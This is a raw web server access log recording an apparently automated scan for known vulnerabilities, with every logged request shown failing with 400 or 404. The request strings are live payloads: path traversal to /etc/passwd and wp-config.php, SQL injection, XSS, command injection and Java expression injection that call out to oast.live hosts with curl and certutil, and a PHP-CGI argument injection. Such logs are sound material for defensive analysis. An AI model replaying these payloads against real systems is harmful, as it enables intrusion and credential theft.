Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 38 2024-12-12 17:45:14 103.153.214.94 GET /wp-admin/admin-ajax.php action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 35 2024-12-12 17:47:53 103.153.214.94 POST /client/api command=samlSso 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 208 2024-12-12 17:49:03 103.153.214.94 GET /admin/cert_download.php file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 61 2024-12-12 17:49:07 103.153.214.94 GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 400 0 0 50 2024-12-12 17:49:07 103.153.214.94 GET /admin/cert_download.php file=pqpqpqpq.txt&certfile=cert_download.php 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 17:49:11 103.153.214.94 GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 400 0 0 34 2024-12-12 17:49:23 103.153.214.94 GET /adminer.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 197 2024-12-12 17:49:24 103.153.214.94 GET /bin/cron.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.7+(KHTML,+like+Gecko)+Version/17.3.74+Safari/617.7 - 404 7 0 199 2024-12-12 17:49:24 103.153.214.94 GET /admin.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 196 2024-12-12 17:49:24 103.153.214.94 GET /cpanel.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_6_8)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/28.0.1500.44+Safari/537.36 - 404 7 0 200 2024-12-12 17:49:24 103.153.214.94 GET /php_info.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.81+Safari/537.36 - 404 7 0 201 2024-12-12 17:49:24 103.153.214.94 GET /.env - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.19 - 404 7 0 200 2024-12-12 17:49:24 103.153.214.94 GET /php-info.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 17:49:24 103.153.214.94 GET /xmlrpc.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 200 2024-12-12 17:49:24 103.153.214.94 GET /cache/index.tpl.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.22 - 404 7 0 201 2024-12-12 17:49:24 103.153.214.94 GET /info.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 17:49:24 103.153.214.94 GET /xmlrpc.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 214 2024-12-12 17:49:24 103.153.214.94 GET /phpinfo.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 226 2024-12-12 17:49:24 103.153.214.94 GET /adminer.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.16 - 404 7 0 224 2024-12-12 17:49:24 103.153.214.94 GET /admin.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.23 - 404 7 0 233 2024-12-12 17:49:25 103.153.214.94 GET /html/usr/share/doc/hostname/copyright? - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 400 0 0 209 2024-12-12 17:49:28 103.153.214.94 GET /web/admin/setup - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 17:49:30 103.153.214.94 GET /zm/index.php sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 206 2024-12-12 17:49:34 103.153.214.94 GET / es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 239 2024-12-12 17:50:44 103.153.214.94 GET /lucees3ezf<img+src=a+onerror=alert('2q3kZ5ntgolVg4rrgnBoEplH0nt')>lujb7/admin/imgProcess.cfm - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 400 0 0 43 2024-12-12 17:50:48 103.153.214.94 GET /lucee/lucees3ezf<img+src=a+onerror=alert('2q3kZ5ntgolVg4rrgnBoEplH0nt')>lujb7/admin/imgProcess.cfm - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.16 - 400 0 0 40 2024-12-12 17:51:36 103.153.214.94 GET /wp-content/plugins/dokan-pro/changelog.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.14 - 404 7 0 205 2024-12-12 17:51:46 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 - 404 7 0 54 2024-12-12 17:51:49 103.153.214.94 GET /Login.aspx - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 211 2024-12-12 17:51:51 103.153.214.94 GET /admin_dev.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 38 2024-12-12 17:51:54 103.153.214.94 GET /index_dev.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 52 2024-12-12 17:51:58 103.153.214.94 GET /app_dev.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/110.0 - 404 7 0 31 2024-12-12 17:53:45 103.153.214.94 POST /Startup/Register - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 17:53:48 103.153.214.94 POST /Token - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 214 2024-12-12 17:54:27 103.153.214.94 GET /prweb/PRAuth/app/default/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:89.0)+Gecko/20100101+Firefox/89.0 - 404 7 0 37 2024-12-12 17:54:27 103.153.214.94 GET /.well-known/acme-challenge/<?xml+version="1.0"?><x:script+xmlns:x="http:/www.w3.org/1999/xhtml">alert(document.domain)</x:script> - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.19 - 400 0 0 43 2024-12-12 17:54:29 103.153.214.94 GET /wt3/forceSave.php file=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 17:55:01 103.153.214.94 POST /management/export.php filename=$(echo+'<?php+echo+md5(2154);+?>'+>+esihujuezghn.php)&type=pdf 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+17_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 7 0 223 2024-12-12 17:55:13 103.153.214.94 GET /password-page/ovf/account-credentials-ovf - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 17:55:13 103.153.214.94 GET /include/thumb.php dir=http\..\admin\login\login_check.php 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 41 2024-12-12 17:55:13 103.153.214.94 GET /help/index.jsp view=%3Cscript%3Ealert(document.cookie)%3C/script%3E 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:99.0)+Gecko/20100101+Firefox/99.0 - 404 7 0 33 2024-12-12 17:55:13 103.153.214.94 GET /connectioncheck.php ip=127.0.0.1+%26%26+curl+http%3A%2F%2F%24%28whoami%29.ctcj3jjbclslbev4n7q0x1ubgj1ncekmx.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 53 2024-12-12 17:55:14 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 205 2024-12-12 17:55:14 103.153.214.94 GET /nacos/v1/cs/ops/derby sql=select+st.tablename+from+sys.systables+st 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.19 - 404 7 0 31 2024-12-12 17:55:14 103.153.214.94 GET /index.php option=com_tweetla&controller=../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 36 2024-12-12 17:55:14 103.153.214.94 GET /cgi-bin/weblogin.cgi username=admin';cat+/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1.2)+Gecko/20090729+Firefox/3.5.2+(.NET+CLR+3.5.30729) - 404 7 0 54 2024-12-12 17:55:14 103.153.214.94 GET /admin/wizard.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 54 2024-12-12 17:55:14 103.153.214.94 GET /_admin/imgdownload.php filename=imgdownload.php 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 55 2024-12-12 17:55:26 103.153.214.94 GET /current_config/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 38 2024-12-12 17:55:51 103.153.214.94 GET /i3geo/exemplos/codemirror.php pagina=../../../../../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:106.0)+Gecko/20100101+Firefox/106.0 - 404 7 0 96 2024-12-12 17:55:51 103.153.214.94 GET /live_mfg.shtml - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 17:56:46 103.153.214.94 POST /business-directory/ dosrch=1&q&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1] 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.14+(KHTML,+like+Gecko)+Version/17.4.63+Safari/617.14 - 404 7 0 199 2024-12-12 17:57:48 103.153.214.94 GET /solr/admin/info/properties:/admin/info/key - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 400 0 0 225 2024-12-12 17:57:56 103.153.214.94 PUT /api/v2/simulation - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML++like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 17:58:36 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 227 2024-12-12 17:59:45 103.153.214.94 POST /webtools/control/view/StatsSinceStart - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 227 2024-12-12 17:59:53 103.153.214.94 POST /webtools/control/forgotPassword/xmldsdump - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 224 2024-12-12 17:59:56 103.153.214.94 GET /common/ncibe.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 18:00:16 103.153.214.94 GET /api/data - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 249 2024-12-12 18:00:20 103.153.214.94 GET /(download)/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/85.0.4183.127+Safari/537.36 - 404 7 0 40 2024-12-12 18:00:22 103.153.214.94 GET /render.html url=https://oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 63 2024-12-12 18:00:57 103.153.214.94 GET /category_view.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 40 2024-12-12 18:01:01 103.153.214.94 GET /folder_view.php - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 33 2024-12-12 18:01:01 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("curl+http:/ctcj3jjbclslbev4n7q0au5xntg6wqybm.oast.live")}__::.x/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.0)+AppleWebKit/618.25.8+(KHTML,+like+Gecko)+Version/17.3+Safari/618.25.8 - 400 0 0 37 2024-12-12 18:01:05 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("certutil+-urlcache+-split+-f+http:/ctcj3jjbclslbev4n7q0p5fhr5mjgfqbg.oast.live")}__::.x/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1 - 400 0 0 32 2024-12-12 18:01:37 103.153.214.94 POST /openam/json/realms/root/authenticate - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 18:01:39 103.153.214.94 GET /WebInterface/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 199 2024-12-12 18:02:17 103.153.214.94 GET /admin/ - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 48 2024-12-12 18:02:18 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 198 2024-12-12 18:02:22 103.153.214.94 GET /solr/admin/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 51 2024-12-12 18:04:04 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.23 - 404 7 0 202 2024-12-12 18:04:59 103.153.214.94 GET /wp-content/plugins/jsmol2wp/php/jsmol.php isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.18 - 404 7 0 60 2024-12-12 18:05:01 103.153.214.94 GET /jeecg-boot/actuator/httptrace/ - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 18:05:47 103.153.214.94 GET /api/v1/devices - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 77 2024-12-12 18:05:47 103.153.214.94 GET /mifs/aad/api/v2/admins/users - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 65 2024-12-12 18:05:53 103.153.214.94 GET /login/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 - 404 7 0 237 2024-12-12 18:05:59 103.153.214.94 POST /node_modules/angular-base64-upload/demo/server.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 203 2024-12-12 18:06:00 103.153.214.94 POST /bower_components/angular-base64-upload/demo/server.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 202 2024-12-12 18:06:36 103.153.214.94 GET /file=C:/Windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 400 0 0 48 2024-12-12 18:06:36 103.153.214.94 GET /photoalbum/index.php urlancien&url=../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.18 - 404 7 0 53 2024-12-12 18:06:37 103.153.214.94 GET /index.php option=com_kif_nexus&controller=../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 39 2024-12-12 18:06:37 103.153.214.94 GET /member/ajax_membergroup.php action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999999)+--+@`'` 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 30 2024-12-12 18:06:37 103.153.214.94 GET /cgi-bin/exportCfgwithpasswd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.8.25 - 404 7 0 41 2024-12-12 18:06:37 103.153.214.94 GET /admin/setup - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 38 2024-12-12 18:06:37 103.153.214.94 GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download file=../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_5_7;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.7+Safari/605.1.15 - 404 7 0 66 2024-12-12 18:06:49 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.79+Safari/537.36+Edge/14.14393 - 404 7 0 244 2024-12-12 18:06:55 103.153.214.94 GET /avatar_uploader.pages.inc file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 18:06:57 103.153.214.94 GET / case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 18:06:59 103.153.214.94 GET / p=1 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 229 2024-12-12 18:07:36 103.153.214.94 GET /default.aspx - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.23 - 404 7 0 209 2024-12-12 18:08:14 103.153.214.94 POST /NmAPI/RecurringReport - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 18:09:22 103.153.214.94 POST /html/ad/adfilestorage/request/checkAcesso.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 221 2024-12-12 18:10:30 103.153.214.94 POST /index.php rest_route=/wqc/v1/query 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 18:10:38 103.153.214.94 GET /GeneralDocs.aspx rpt=../../../../Windows/win.ini 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.22 - 404 7 0 213 2024-12-12 18:10:55 103.153.214.94 POST /php-cgi/php-cgi.exe %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 220 2024-12-12 18:10:55 103.153.214.94 POST /index.php %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.18 - 404 7 0 208 2024-12-12 18:10:57 103.153.214.94 POST /test.php %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 223 2024-12-12 18:10:57 103.153.214.94 POST /test.hello %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 195 2024-12-12 18:11:27 103.153.214.94 GET /pacs/nocache.php path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 63 2024-12-12 18:11:28 103.153.214.94 GET /mobile/plugin/SyncUserInfo.jsp userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.93+Safari/537.36 - 404 7 0 32 2024-12-12 18:11:41 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 198 2024-12-12 18:13:10 103.153.214.94 GET /sftp-config.json - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 60 2024-12-12 18:13:13 103.153.214.94 GET /ftpsync.settings - 8172 - 206.238.196.225 